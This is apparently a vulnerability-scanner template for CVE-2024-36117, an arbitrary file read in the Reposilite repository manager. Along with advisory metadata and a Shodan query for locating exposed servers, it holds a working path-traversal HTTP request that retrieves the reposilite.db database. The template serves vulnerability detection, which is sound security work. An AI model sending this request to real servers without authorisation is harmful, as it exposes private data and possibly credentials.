CVE-2024-36117: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read

id: CVE-2024-36117

info:
  name: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.
  reference:
    - https://github.com/advisories/GHSA-82j3-hf72-7x93
    - https://github.com/dzikoysk/reposilite/commit/e172ae4b539c822d0d6e04cf090713c7202a79d6
    - https://github.com/dzikoysk/reposilite/releases/tag/3.5.12
    - https://github.com/dzikoysk/reposilite/security/advisories/GHSA-82j3-hf72-7x93
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36117
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-36117
    cwe-id: CWE-22
    epss-score: 0.6574
    epss-percentile: 0.98456
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1212523028
  tags: cve,cve2024,reposilite,lfi

variables:
  javadoc_path: "releases/javadoc/1.0.0/"

http:
  - raw:
      - |
        GET /javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"reposilite") && contains(body,"SQLite format")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 4a0a004730450221008779f56b73c9f0c0a97f6a25398a39c89522e6a0d4e0c45345176bccb2abfe67022032fcea702f002bd0b2cdd9256e6294fb0df29490ab069c9ed05dc0b440328759:922c64590222798bb761d5b6d8e72950